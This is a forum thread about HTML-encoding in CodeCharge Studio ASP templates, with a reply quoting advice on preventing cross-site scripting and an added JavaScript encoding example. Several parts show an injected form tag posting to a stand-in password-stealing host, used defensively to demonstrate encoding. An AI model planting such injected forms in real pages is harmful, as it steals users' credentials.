rhonda
Posted: 06/08/2003, 3:56 AM
I am using CodeCharge Studio. I have an ASP form (and template) and all the data is being passed in HTML-encoded format. I have a field that I do not want passed as HTML-encoded. Is there a way to pass that field in a template as not HTML-encoded?
I am creating a series of links dynamically in the ASP page and I want them to show up in a select box in the HTML page, but it is encoding them.

DaveRexel
Posted: 06/08/2003, 6:30 AM
How do we Protect Against Cross Site Scripting?
Protecting against a Cross Site Scripting attack is relatively simple: simply use the Server.HtmlEncode method. Server.HtmlEncode takes a string and replaces any characters that the browser would try to interpret with their HTML encoding, so that the browser prints the characters to the screen instead. For example, if we call the Server.HtmlEncode method passing in:
</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">
The resulting string will be:
&lt;/form&gt;&lt;form method=&quot;POST&quot; action=&quot;www.hax0r.com/passwordstealer.asp&quot;&gt;
To change our original code to use html encoding, we need to change the line that prints the value of errorMessage from <%=request.querystring("errorMessage")%> to <%=server.htmlencode(request.querystring("errormsg"))%>
Once again, sanitization of data that is passed back to the browser should be performed on all data that has passed from an insecure source (the client). We should also sanitize any data that comes from any source and is passed back to the browser, as a hacker could break into our database/file system, insert his code into the correct record/file, and compromise our Web site in that manner. For a good article on Cross Site Scripting attacks, see: The Cross Site Scripting FAQ.
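As an added illustration (not code from this thread, from CodeCharge Studio, or from the quoted article), the block below implements the Server.HtmlEncode behaviour described above in JavaScript and then goes one step further to address the original question about the select box: the option markup is written literally by the code, and only the dynamic link URL and label are encoded. The function names htmlEncode and buildOptions and the sample link list are assumptions made for this example.

```javascript
// Added example (not from the forum thread or CodeCharge Studio): a
// JavaScript equivalent of ASP's Server.HtmlEncode, plus a helper that
// builds <option> markup for a <select> while encoding only the data.

// Encode the characters an HTML parser treats specially. Ampersand must be
// handled first so the entities produced for the other characters are not
// themselves re-encoded. Single quotes are included as a precaution for
// attribute values delimited with single quotes.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Build the <option> elements for a select box from a list of links.
// The markup itself is literal in the code; only the url and label, which
// come from data, pass through htmlEncode. This is the usual answer to
// "I don't want that field encoded": encode the data, not the template.
function buildOptions(links) {
  return links
    .map(l => `<option value="${htmlEncode(l.url)}">${htmlEncode(l.label)}</option>`)
    .join("\n");
}

// Constructed sample data: two ordinary links and one whose label carries
// the injected form from the post above, to show it is rendered inert.
const sampleLinks = [
  { url: "/reports/list.asp?id=1", label: "Monthly report" },
  { url: "/reports/list.asp?id=2&view=full", label: "Full report" },
  { url: "/x", label: '</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">' },
];

// Usage: print the encoded form of the article's example string and the
// generated select box options.
console.log(htmlEncode('</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">'));
console.log("<select name=\"report\">\n" + buildOptions(sampleLinks) + "\n</select>");
```

The generated options still render as real `<option>` elements in the browser because the tags come from the code, while the hostile label appears as visible text rather than as a second form. That is the separation CodeCharge's template encoding enforces: the template's own markup is never encoded, only the values substituted into it.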

DaveRexel
Posted: 06/08/2003, 6:32 AM
Extremely sorry, I fired off the answer without looking for the true problem.
My apologies - must get some sleep soon.